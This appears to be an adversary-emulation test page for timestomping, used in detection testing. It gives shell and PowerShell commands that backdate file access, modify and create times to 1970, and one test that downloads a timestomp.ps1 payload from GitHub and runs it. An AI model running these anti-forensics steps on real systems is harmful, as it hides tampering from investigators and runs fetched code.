Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.Timestomping may be used along with file name Masquerading to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
-
Atomic Test #4 - Modify file timestamps using reference file
-
Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
-
Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
-
Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
Stomps on the access timestamp of a file
Supported Platforms: Linux, macOS
Name | Description | Type | Default Value |
---|---|---|---|
target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename |
touch -a -t 197001010000.00 #{target_filename}
Stomps on the modification timestamp of a file
Supported Platforms: Linux, macOS
Name | Description | Type | Default Value |
---|---|---|---|
target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename |
touch -m -t 197001010000.00 #{target_filename}
Stomps on the create timestamp of a file
Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution.
Supported Platforms: Linux, macOS
Name | Description | Type | Default Value |
---|---|---|---|
target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename |
NOW=$(date)
date -s "1970-01-01 00:00:00"
touch #{target_filename}
date -s "$NOW"
stat #{target_filename}
Modifies the modify
and access
timestamps using the timestamps of a specified reference file.
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
Supported Platforms: Linux, macOS
Name | Description | Type | Default Value |
---|---|---|---|
target_file_path | Path of file to modify timestamps of | Path | /opt/filename |
reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh |
touch -acmr #{reference_file_path} #{target_file_path}
Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00 |
file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1551.006_timestomp.txt |
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
Remove-Item #{file_path} -Force -ErrorAction Ignore
if (Test-Path #{file_path}) {exit 0} else {exit 1}
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00 |
file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1551.006_timestomp.txt |
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
Remove-Item #{file_path} -Force -ErrorAction Ignore
if (Test-Path #{file_path}) {exit 0} else {exit 1}
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT. To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
target_date_time | Date/time to replace original timestamps with | String | 01/01/1970 00:00:00 |
file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1551.006_timestomp.txt |
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
Remove-Item #{file_path} -Force -ErrorAction Ignore
if (Test-Path #{file_path}) {exit 0} else {exit 1}
New-Item -Path #{file_path} -Force | Out-Null
Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null
Timestomp kxwn.lock.
Successful execution will include the placement of kxwn.lock in #{file_path} and execution of timestomp.ps1 to modify the time of the .lock file.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
file_path | File path for timestomp payload | String | $env:appdata\Microsoft |
import-module #{file_path}\timestomp.ps1
timestomp -dest "#{file_path}\kxwn.lock"
Remove-Item #{file_path}\timestomp.ps1 -ErrorAction Ignore
Remove-Item #{file_path}\kxwn.lock -ErrorAction Ignore
if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1}
Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1"
if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1}
New-Item -Path #{file_path}\kxwn.lock -ItemType File